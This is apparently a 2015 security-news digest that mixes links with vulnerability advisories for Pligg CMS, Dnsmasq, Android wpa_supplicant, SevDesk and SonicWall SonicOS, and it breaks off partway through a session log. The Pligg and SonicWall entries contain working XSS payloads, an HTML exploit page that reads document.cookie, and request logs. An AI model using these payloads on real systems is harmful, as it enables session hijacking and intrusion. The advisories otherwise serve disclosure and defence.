#Tested Link: http://localhost/pligg/admin/admin_page.php 

Description: Pligg CMS is a content management platform that powers tens of thousands of websites. It specializes in 
creating social publishing networks, where users submit and promote content similar to sites like Digg, Reddit, and 
Mixx.Pligg CMS is vulnerable to stored xss vulnerability. The parameter "page_title" and "page_content" are the 
vulnerable parameter which will lead to its compromise.

#Proof of Concept (PoC): "><img src="a.jpg" onerror="alert('XSS')"/>

TLS/SSL Security In PHP: Avoiding The Lowest Common Insecure Denominator Trap

A few weeks back I wrote a piece about updating PHARs in-situ, what we’ve taken to calling “self-updating”. In that article, I touched on making Transport Layer Security (TLS, formerly SSL) enforcement one of the central objectives of a self-updating process.

more here........http://blog.astrumfutura.com/2015/04/tlsssl-security-in-php-avoiding-the-lowest-common-insecure-denominator-trap/

Qt Creator 3.4.0 released

Qt creator open source multi-platform IDE  has a new release and changelog here.....https://blog.qt.io/blog/2015/04/23/qt-creator-3-4-0-released/

DYREZA’S ANTICRYPT

In the previous post, we have described how to set up a loft to monitor Dyreza with the help of virtual machines configured with breakpoints at addresses where communications appear in clear text. Configuration file updates can thus be obtained in real-time easily. Another way to monitor this kind of malware using a decentralised architecture is to implement parts of the malicious binary in a thin client, which requires to fully understand its decryption routine details.
more here......http://www.lexsi-leblog.com/cert-en/dyrezas-anticrypt.html

pgcli

Pgcli is a command line interface for Postgres with auto-completion and syntax highlighting

more here......http://pgcli.com/index


Screenshot

User-defined Storage-based Covert Communication

One of my favorite Cobalt Strike technologies is Malleable C2. This is a domain specific language for user-defined storage-based covert communication. That’s just a fancy way of saying that you, the operator, have control over what Cobalt Strike’s Beacon looks like when it communicates with you.

more here.......http://blog.cobaltstrike.com/2015/04/23/user-defined-storage-based-covert-communication/

malleablec2

Paper: Breaking the Rabin-Williams digital signature system implementation in the Crypto++ library

This paper describes a bug in the implementation of the RabinWilliams
digital signature in the Crypto++ framework. The bug is in
the misuse of blinding technique that is aimed at preventing timing
attacks on the digital signature system implementation, but eventually
results in an opportunity to find the private key having only two
different signatures of the same message. The CVE identifier of the
issue is CVE-2015-2141.


Some Recent RSA 2015 Conference Uploaded Video's

Quantitative Security: Using Moneyball Techniques to Defend Corporate Networks -
In “Moneyball,” Michael Lewis describes how a sports team used data analytics to field the best possible players. Can this quantitative approach help a company achieve the highest possible level of security? Amit Mital will discuss how advanced data mining on massive amounts of security intelligence will help organizations thwart even the most complex attacks on their systems and information. more here...........http://www.rsaconference.com/media/quantitative-security-using-moneyball-techniques-to-defend-corporate-networks


Talking ’bout My Next Generation
Who would’ve thought a 50-year-old song would’ve been the perfect descriptor for how cyber security practitioners sometimes feel viewed by the rest of the world? In the immortal words of The Who, “People try to put us down.” Come hear about what’s next for cyber security. The answer might surprise you and “cause a big sensation.” more here......http://www.rsaconference.com/media/talking-bout-my-next-generation


Welcome to the New School of Cyber Defense
The old school of cyber defense emphasized securing infrastructure and restricting data flows. But data needs to run freely to power our organizations. The new school of cyber defense calls for security that is agile and intelligent. It emphasizes protecting the interactions between our users, our applications and our data. The world has changed, and we must change the way we secure it. more here....http://www.rsaconference.com/media/welcome-to-the-new-school-of-cyber-defense


Pass-the-Hash II
Abbreviated version of Pass-the-Hash II: The Wrath of Hardware with Nathan Ide, Principal Development Lead, Microsoft. more here.........https://www.youtube.com/watch?v=K21J5X4HO04


New Threat Report Via F-Secure

The security firms comprehensive threat report, based on its analysis of H2 2014 data, is now available here......https://www.f-secure.com/documents/996508/1030743/Threat_Report_H2_2014


H2 2014 Threat Report At A Glance

Lack of Android Updates Come Under FTC Scrutiny?

Last week, a rather interesting complaint was filed before the Federal Trade Commission. In a 16-page complaint, the American Civil Liberties Union described the lack of updates for many Android devices as “unfair and deceptive business practices”. The complaint went on to ask the respondents (the top four wireless carriers in the United States) to let customers with unpatched (and vulnerable) devices out of their contracts early.

more here........http://blog.trendmicro.com/trendlabs-security-intelligence/lack-of-android-updates-to-come-under-ftc-scrutiny/

Dnsmasq 2.72 Unchecked returned value

Dnsmasq provides network infrastructure for small networks: DNS, DHCP, router advertisementand network boot.(Source: http://www.thekelleys.org.uk/dnsmasq/doc.html) 

"Dnsmasq 2.72 Unchecked returned value"

Description
------------------------------------------------------------
Dnsmasq does not properly check the return value of the setup_reply()
function called during a tcp connection (by the tcp_request() function).
This return value is then used as a size argument in a function which writes
data on the client's connection.  This may lead, upon successful
exploitation, to reading the heap memory of dnsmasq.
 
In more detail:
Function tcp_request() calls setup_reply() and the returned value is used as
a size argument in a write function.
 
m = setup_reply(header, (unsigned int)size, addrp, flags,
daemon->local_ttl);
read_write(confd, packet, m + sizeof(u16), 0));
 
The m variable is determined by a subtraction between the
return of  skip_questions() and header pointer.
The return value of skip_question doesn't checked for error(NULL).
As a result the negative value of pointer(-header), might returned.
 
size_t setup_reply(struct dns_header *header, size_t qlen,
struct all_addr *addrp, unsigned int flags, unsigned long ttl)
{
       unsigned char *p = skip_questions(header, qlen)
       return p - (unsigned char *)header
}
 
read_write checks if the size argument is positive. In case of a 32 bit
system
size_t m would be 4 bytes and read_write will automatically exit. In case of
64
bit system size_t m is 8 bytes and may turn to positive if the sign bit of
the
32 bit value is 0.
 
If m is less than 0xffffffff80000000, dnsmasq will be exploited by a
potential attacker who will remotely read dnsmasq heap. If the above
condition is not met, dnsmasq exits properly.

Researcher
------------------------------------------------------------
Nick Sampanis (n.sampanis[a t]obrela[do t]com)


Vulnerability
------------------------------------------------------------
Unchecked return value CVE-2015-3294

Identification date:
------------------------------------------------------------
07/04/2015 - 09/04/2015

Solution - fix & patch
------------------------------------------------------------
Please download dnsmasq-2.73rc4.tar.gz

Reference:
------------------------------------------------------------
http://lists.thekelleys.org.uk/pipermail/dnsmasq-discuss/2015q2/009382.html
https://www.obrela.com/home/security-labs/advisories/osi-advisory-osi-1502/

Android wpa_supplicant WLAN Direct remote buffer overflow

1. Advisory Information
Advisory URL: http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.p1ECc3&id=19
Date published: 2015-04-23
Date of last update: 2015-04-23

2. Vulnerability Information
Class: heap overflow
Impact: memory information leak and remote code execution
Remote Exploitable: Yes
Local Exploitable: No
CVE Name: CVE-2015-1863
Vulnerability Information and Patch: http://w1.fi/security/2015-1/

3. Vulnerability Description
  In Android, wpa_supplicant is designed to be a "daemon" program that runs in the background and acts as the backend 
component controlling the wireless connection.. When WLAN Direct function of wpa_supplicant is enabled, a malformed p2p 
invitation type packet with long ssid can trigger a heap overflow vulnerability. An attacker could launch a remote 
attack in the wireless device signal coverage, access to the victim's android device and execute native code with the 
corresponding user privileges (in the android is wifi user). The user has permission to read the saved WIFI password, 
change network configuration, hijacking all Wi-Fi traffic. When combined with a local privilege escalation 
vulnerability that allows an attacker to remotely control a host of victims, implant Trojans and other underlying 
implant systems.
4. Vulnerable Packages
 Android 4/Android 5
 wpa_supplicant 2.x
5. Credits
Smart hardware research group of Alibaba security team for discovering the vulnerability.
6. Technical Description
 wpa_supplicant malloc a p2p_device structure, the oper_ssid field size of which is 0x20 bytes. In the p2p invitation 
packet the size of ssid field is described with an octet, the max of which is 0xff. When copy to oper_ssid field, the 
length is not checked. When the size of ssid exceeds 0x20 bytes, it can overflow other fields of the p2p_device 
structure and overflow heap structure when exceeds 0x40 bytes.
    In the android version 5.1, the source is:
============ p2p_device structure( wpa_supplicant/p2p/p2p_i.h)============
struct p2p_device {
    [……….]
    int oper_freq;
    u8 oper_ssid[32];  <----- fixed 0x20 bytes 
    size_t oper_ssid_len;
       [……….]
    /**
    * go_neg_conf - GO Negotiation Confirmation frame
    */
    struct wpabuf *go_neg_conf;
    int sd_pending_bcast_queries;
};
=========(wpa_supplicant/p2p/p2p.c p2p_add_device ==============
int p2p_add_device(struct p2p_data *p2p, const u8 *addr, int freq,
          struct os_reltime *rx_time, int level, const u8 *ies,
          size_t ies_len, int scan_res)
{
    [……….]
    if (os_memcmp(addr, p2p_dev_addr, ETH_ALEN) != 0)
       os_memcpy(dev->interface_addr, addr, ETH_ALEN);
    if (msg.ssid &&
        (msg.ssid[1] != P2P_WILDCARD_SSID_LEN ||
         os_memcmp(msg.ssid + 2, P2P_WILDCARD_SSID, P2P_WILDCARD_SSID_LEN)
         != 0)) {
        os_memcpy(dev->oper_ssid, msg.ssid + 2, msg.ssid[1]);
//the dest buf is 0x20, but the size is controlled by user input, trigger buffer overflow 
       dev->oper_ssid_len = msg.ssid[1];
    }
[……….]
7. Vulnerability Impact Assessment:
    1)Affected product:Affect all devices of android version below 5.1 
    2)Default configuration exploitable analysis:Although much of android devices enable WLAN direct when user enters 
WLAN Direct UI, but: 
    We found some models of well-known mobile phone manufacturers (such as Xiaomi, Huawei), default to open the WLAN 
Direct. Even if the user 
never entered the WLAN Direct UI, the attacker can initiate a WLAN direct connection and trigger this vulnerability 
without user interaction. However, 
an attacker needs to know WLAN Direct MAC address, the address is the MAC address of user equipment with first byte OR 
2, MAC address of the user 
equipment can acquire easily by WIFI packet sniffer, so you can calculate WLAN Direct MAC address, for example the user 
device MAC address 14: 12: 34: 56: 78: 90, 
then WLAN Direct MAC address is 16:12 : 34: 56: 78: 90, which means that some models of mobile phone, simply open the 
WIFI service, can suffer from the vulnerability attack.
  For other models without WLAN Direct default enabled need to pay attention, because a lot of file transfer software 
use WLAN Direct feature and will enable it. 
And this feature once enabled, even if the user exits the WLAN Direct UI, the feature is enabled until the device 
reboot or WIFI restart. During this time the device is affected and can be attack remotely.
    3)Impact
    This vulnerability can leak information, use leaked information with ROP to bypass ASLR and DEP. Exploit this 
vulnerability successfully, attackers can execute
 native code with wifi user permission. Then with wifi user permission can change wifi configuration and hijack network 
traffic. 
    And this vulnerability can be exploited remotely, if composite a local privilege escalation vulnerability, 
attackers can implant trojan without physically touch victim devices. 
  So this vulnerability is high risk, especially for wlan direct enabled default devices. 
8. Poc and Coredump 
    See Advisory URL: http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.p1ECc3&id=19
9. Report Timeline
 2015-4-3:send vulnerability report to android security team
 2015-4-8:android security team acknowledges the vulnerability and forward it to wpa_supplicant maintainer
 2015-4-8:wpa_supplicant maintainer acknowledges
 2015-4-13:wpa_supplicant maintainer acknowledges timeline for release a fix
 2015-4-22:wpa_supplicant maintainer publish the fix and security advisory
 2015-4-23:The advisory is published

Visualizing a single null-byte heap overflow exploitation

When Phantasmal Phantasmagoria wrote The Malloc Malleficarum back in 2005 he exposed several ways of gaining control of an exploitation through corruption of the internal state of the libc memory allocator. Ten years later people are still exploring the possibilities offered by such complex data structures. In this article I will present how I solved a challenge from Plaid CTF 2015 and the tool I wrote in the process.

Phantasmal's paper addressed the patches by libc developers to address previous exploitation techniques. Some of the insights he presented are still relevant and people continue go further but new techniques emerged. Project Zero gave a good example of this with The Poisoned NUL Byte which they presented in 2014.

Quick fuzzing of the target reveals some memory errors

more here........http://wapiflapi.github.io/2015/04/22/single-null-byte-heap-overflow/

Ubuntu local privilege escalation

Ubuntu local privilege escalation reported by Tavis Ormandy that this is still not patched. (includes PoC) here......http://www.openwall.com/lists/oss-security/2015/04/22/12

SevDesk v1.1 iOS - Persistent Dashboard Vulnerability

Document Title:
===============
SevDesk v1.1 iOS - Persistent Dashboard Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1311


Release Date:
=============
2015-04-23


Vulnerability Laboratory ID (VL-ID):
====================================
1311


Common Vulnerability Scoring System:
====================================
4.2


Product & Service Introduction:
===============================
Official app for mobile use of sevDesk. A product of SEVENIT GmbH. 

Daily Backup
256bit SSL encryption
TÜV certified data center

Free version
No hidden costs
No minimum contract term

iPhone App
Runs in any browser
No installation required on the PC

Easy to use
Reduced to the essentials
Automated, where it is only possible

(Copy of the Vendor Homepage: https://sevdesk.de/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official SEVENIT GmbH SevDesk mobile application (api).


Vulnerability Disclosure Timeline:
==================================
2014-09-01: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-09-02: Vendor Notification (SevDesk Developer Team)
2015-04-23: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
SevenIT
Product: SevDesk - iOS Mobile Web Application (API) 1.1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official SEVENIT Software GmbH sevDesk v1.1 iOS mobile web-application (api).
The vulnerability allows remote attackers or low privileged user account to inject own malicious script codes to the application-side of the vulnerable 
web-application module or service.

The security vulnerability is located in the `firstname` values of the main sevDesk `Dasboard` application module & api. Remote attackers are able to inject 
own script codes to the mobile dashboard through the api by manipulation of the registration information in the client.

The execution of the script code occurs after the inject on the application-side in the main mobile dashboard status list. If the test user account apply for 
any changes in the account profile the activity becomes visible. In the context were the information and details becomes visible is the location were the 
execution of the persistent injected script code takes place. The attack vector is persistent and the request method to inject the code is POST. 

The security risk of the persistent script code inject web vulnerability is estimated as meidum with a cvss (common vulnerability scoring system) count of 4.2. 
Exploitation of the persistent input validation web vulnerability requires a low privileged sevdesk user account with restricted access and low user interaction. 
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects to malicious source and persistent 
manipulation of affected or connected application modules (api).

Request Method(s):
    [+] POST

Vulnerable Application(s):
    [+] sevDesk v1.1 iOS

Vulnerable Module(s):
    [+] Registration to SevDesk

Vulnerable Parameter(s):
    [+] firstname (display name)

Affected Module(s):
    [+] Dasboard Index Status List


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

1. Install the application to your iOS device (ipad iphone)
2. Register an new account 
3. Include as name value your own malicious script code payload
4. Save the settings and open the Dasboard status listing
Note: After the save the context gets discplayed by the mobile app api through the web database
5. The script code execution occurs in the main status messages
6. Successful reproduce of the security vulnerability in the mobile iOS application!


Picture(s):
   ../1.png
   ../2.png
   ../3.png


Solution - Fix & Patch:
=======================
The issue can be patched by a secure parse and encode of the user credentials on registration through the mobile application api.
Restrict the user input to register and parse also the status listing in the main dasboard which becomes visible after the malicious changes.


Security Risk:
==============
The security risk of the persistent mobile web vulnerability in the api is estimated as medium. (CVSS 4.2)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com    - www.vuln-lab.com            - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com  - research@vulnerability-lab.com           - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com - vulnerability-lab.com/contact.php          - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab   - facebook.com/VulnerabilityLab           - youtube.com/user/vulnerability0lab
Feeds:     vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php     - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php   - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

    Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™


SonicWall SonicOS 7.5.0.12 & 6.x - Cross Site Vulnerability

Document Title:
===============
SonicWall SonicOS 7.5.0.12 & 6.x - Cross Site Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1359


Release Date:
=============
2015-04-23


Vulnerability Laboratory ID (VL-ID):
====================================
1359


Common Vulnerability Scoring System:
====================================
3


Product & Service Introduction:
===============================
The proven SonicOS architecture is at the core of every Dell™ SonicWALL™ firewall from the SuperMassive™ E10800 to the TZ 100. 
SonicOS uses deep packet inspection technology in combination with multi-core specialized security microprocessors to deliver 
application intelligence, control, and real-time visualization, intrusion prevention, high-speed virtual private networking (VPN) 
technology and other robust security features.

(Copy of the Vendor Homepage: http://www.sonicwall.com/us/en/products/Network-Security-Platform.html )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a cross site vulnerability in the official SonicWall SonicOS v6.x and v7.5.0.12.


Vulnerability Disclosure Timeline:
==================================
2015-04-23: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
DELL
Product: Sonicwall SonicOS 7.5.0.12 & v6.x


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
Multiple client-side cross site scripting web vulnerabilities has been discovered in the official SonicWall SonicOS v6.x and v7.5.0.12.
The security vulnerability allows remote attackers to manipulate client-side application to browser requests to compromise session information.

The vulnerability is located in the `searchSpoof and searchSpoofIpDet` values of the `Network > MAC-IP Anti-spoof` module. Remote attackers are able to 
inject malicious script codes to client-side application requests. Remote attackers are able to prepare special crafted weblinks to execute client-side 
script code that compromises the sonicos application user/admin session data. The execution of the script code occurs in the mac-ip anti spoof module.
The attack vector of the vulnerability is located on the client-side of the online-service and the request method to inject or execute the code is GET.

The security risk of the non-persistent cross site vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.0.
Exploitation of the non-persistent cross site scripting web vulnerability requires no privileged web application user account and low user interaction. 
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent load 
of malicious script codes or non-persistent web module context manipulation.

Request Method(s):
    [+] GET

Vulnerable Module(s):
    [+] Network > MAC-IP Anti-spoof

Vulnerable File(s):
    [+] macIpSpoofView.html

Vulnerable Parameter(s):
    [+] searchSpoof
    [+] searchSpoofIpDet


During the client security tests the research team noticed that the official vm version and the all appliance models are affected by the security issue. 
The following versions and models of the sonicwall appliance web-application are affected by the remote cross site scripting vulnerability.

Affected Model(s):
    [+] (CASS) Anti Spam - UTM Integrated Anti-Spam
    [+] (CASS) Anti Spam - Enhanced Comprehensive Anti-spam
    [+] (CASS) Anti Spam - Email Security

Affected Version(s):
    [+] SonicOS v7.5.0.12
    [+] SonicOS v6.x


Proof of Concept (PoC):
=======================
The client-side cross site scripting vulnerability can be exploited by remote attackers without privileged application user account and 
with low or medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information 
and steps below to continue.


PoC: Payload(s)
https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=%22%3E%3Ciframe%20src=http://www.vulnerability-lab.com onload=alert("PENTEST")%20<&searchSpoofIpDet=[x]

https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=[x]
&searchSpoofIpDet=%22%3E%3Ciframe%20src%3Da%20onload%3Dalert%28%22PENTEST%22%29%20 


PoC: Exploit

<html>
<head><body>
<title>Sonicwall AntiSpam "SonicOS Enhanced 5.9.0.7" - (searchSpoof & searchSpoofIpDet) Cross Site Scripting PoC</title>
<iframe src=https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=%22%3E%3Ciframe src=http://www.vulnerability-lab.com onload=alert("PENTEST")%20<&searchSpoofIpDet=[x]>
<br>
<img src=https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=[x]
&searchSpoofIpDet=%22%3E%3Ciframe%20src%3Da%20onload%3Dalert%28%22PENTEST%22%29%20>
<br>
<iframe src=https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=%22%3E%3Cimg src=http://www.vulnerability-lab.com/files/ptest.png onload=alert(document.cookie)%20<&searchSpoofIpDet=%22%3E%3Cimg 
src=http://www.vulnerability-lab.com/files/ptest.png onload=alert(document.cookie)%20<
</body></head>
</html>

Note: Exploiting a Cross Site Scripting Vulnerability in the searchSpoof value of the macIpSpoofView.html file.



PoC: Vulnerable Source

<td class="listLabel" align="left" nowrap="" width="15%">
<span class="objItemSpacing">
<input title="" name="capCbox" onclick="checkAllSpoofIp(this);" onfocus="if (this.disabled) { this.blur(); }" type="checkbox">
</span>
    <span class="listLabel" align="left" nowrap="">
     <script type="text/JavaScript">
     <!--
      setSpoofIpColHead(1, 'IP Address');
     // -->
</script><a class="tableLink" href="/macIpSpoofView.html?tableSortCol=1&tableSortInverted=0&
searchSpoof="><[CLIENT-SIDE SCRIPT CODE EXECUTION!];)" &searchspoofipdet="&startItem=0&startItemIpDet=0"">IP Address</a>
    </span>
   </td>
   <td class="listLabel" align="left" width="10%" nowrap>
    <script type="text/JavaScript">
    <!--
     setSpoofIpColHead(2, 'Type');
    // -->
    </script>
   </td>
   <td class="listLabel" align="left" width="10%" nowrap>
    <script type="text/JavaScript">
    <!--
     setSpoofIpColHead(3, 'Interface');
    // -->
    </script>
   </td>
   <td class="listLabel" align="left" width="15%" nowrap>
    <script type="text/JavaScript">
    <!--
     setSpoofIpColHead(4, 'MAC Address');
    // -->
    </script>
   </td>
   <td class="listLabel" align="left" width="20%" nowrap>
    <script type="text/JavaScript">
    <!--
     setSpoofIpColHead(5, 'Host Name');
    // -->
    </script>



--- PoC Session Logs [GET] ---
Status: 200[OK] 

GET https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=%22%3E%3C[CLIENT-SIDE SCRIPT CODE INJECTION!]&searchSpoofIpDet= Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[cas.127.0.0.1:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://cas.127.0.0.1:8080/macIpSpoofView.html]
      Cookie[__utma=227649090.564465250.1416863624.1416863624.1416865480.2; __utmc=227649090; __utmz=227649090.1416863624.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=227649090.|1=User%3AUnkown=Unknown=1; referreringDomain=; SonicwallReferreringDomain=70160000000jxw7; _ga=GA1.2.564465250.1416863624; s_fid=23E57A7F416D34BD-3112FD9D33A8F2CA; s_cc=true; mbox=check#true#1416865554|session#1416865493280-142580#1416867354|PC#1416865493280-142580.26_06#1418075095; s_nr=1416865503646; s_getval=backlink; s_ppv=marketing.sonicwall.com%2Fregister%2F69295; s_sq=%5B%5BB%5D%5D; s_c49=c%3Dus%26l%3Den%26s%3Dcorp; cidlid=%3A%3A; s_channelstack=%5B%5B'Referrers'%2C'1416865503950'%5D%5D; sessionTime=2014%2C10%2C24%2C22%2C45%2C3%2C950; s_hwp=null%7C%7Cnull%7C%7C24%3A11%3A2014%3A22%3A45%7C%7CN%7C%7CN%7C%7Cnull%7C%7C0%7C%7Cnull%7C%7Cnull%7C%7CN%7C%7Cnull%7C%7Cnull%7C%7Cnull; s_sv_sid=75828994935; s_sv_112_p1=1@11@s/15062&e/2; s_sv_112_s1=1@16@a//1416865504579; curUrl=macIpSpoofView.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 1004=1; 1000=9; 777=1]
      Connection[keep-alive]
   Response Header:
      Server[SonicWALL]
      Expires[-1]
      Cache-Control[no-cache]
      Content-Type[text/html; charset=UTF-8;]



-
Status: 200[OK] 

GET https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=&searchSpoofIpDet=%22%3E%3Ciframe%20src%3Da%20onload%3Dalert%28%22PENTEST%22%29%20 Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[cass240.demo.sonicwall.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://cass240.demo.sonicwall.com/macIpSpoofView.html]
      Cookie[__utma=227649090.564465250.1416863624.1416865480.1417100584.3; __utmc=227649090; __utmz=227649090.1416863624.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=227649090.|1=User%3AUnkown=Unknown=1; referreringDomain=; SonicwallReferreringDomain=70160000000jxw7; _ga=GA1.2.564465250.1416863624; s_fid=23E57A7F416D34BD-3112FD9D33A8F2CA; s_cc=true; mbox=check#true#1416865554|session#1416865493280-142580#1416867354|PC#1416865493280-142580.26_06#1418075095; s_nr=1416865503646; s_getval=backlink; s_ppv=marketing.sonicwall.com%2Fregister%2F69295; s_sq=%5B%5BB%5D%5D; s_c49=c%3Dus%26l%3Den%26s%3Dcorp; cidlid=%3A%3A; s_channelstack=%5B%5B'Referrers'%2C'1416865503950'%5D%5D; sessionTime=2014%2C10%2C24%2C22%2C45%2C3%2C950; s_hwp=null%7C%7Cnull%7C%7C24%3A11%3A2014%3A22%3A45%7C%7CN%7C%7CN%7C%7Cnull%7C%7C0%7C%7Cnull%7C%7Cnull%7C%7CN%7C%7Cnull%7C%7Cnull%7C%7Cnull; s_sv_sid=75828994935; s_sv_112_p1=1@11@s/15062&e/2; s_sv_112_s1=1@16@a//1416865504579; curUrl=macIpSpoofView.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 1004=1; 1000=9; 777=1; __utmb=227649090.2.10.1417100584; __utmt=1; _gat=1]
      Connection[keep-alive]
   Response Header:
      Server[SonicWALL]
      Expires[-1]
      Cache-Control[no-cache]
      Content-Type[text/html; charset=UTF-8;]



-
Status: 200[OK] 
GET https://cas.127.0.0.1:8080/[CLIENT-SIDE SCRIPT CODE EXECUTION!] Load Flags[LOAD_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[cas.127.0.0.1:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://cas.127.0.0.1:8080/macIpSpoofView.html?
mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=%22%3E%3C[CLIENT-SIDE SCRIPT CODE INJECTION!]&searchSpoofIpDet=]
      
Cookie[__utma=227649090.564465250.1416863624.1416863624.1416865480.2; __utmc=227649090; __utmz=227649090.1416863624.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 
__utmv=227649090.|1=User%3AUnkown=Unknown=1; referreringDomain=; SonicwallReferreringDomain=70160000000jxw7; _ga=GA1.2.564465250.1416863624; s_fid=23E57A7F416D34BD-3112FD9D33A8F2CA; 
s_cc=true; mbox=check#true#1416865554|session#1416865493280-142580#1416867354|PC#1416865493280-142580.26_06#1418075095; s_nr=1416865503646; s_getval=backlink; 
s_ppv=marketing.sonicwall.com%2Fregister%2F69295; s_sq=%5B%5BB%5D%5D; s_c49=c%3Dus%26l%3Den%26s%3Dcorp; cidlid=%3A%3A; s_channelstack=%5B%5B'Referrers'%2C'1416865503950'%5D%5D; 
sessionTime=2014%2C10%2C24%2C22%2C45%2C3%2C950; s_hwp=null%7C%7Cnull%7C%7C24%3A11%3A2014%3A22%3A45%7C%7CN%7C%7CN%7C%7Cnull%7C%7C0%7C%7Cnull%7C%7Cnull%7C%7CN%7C%7Cnull%7C%7Cnull%7C%7Cnull; 
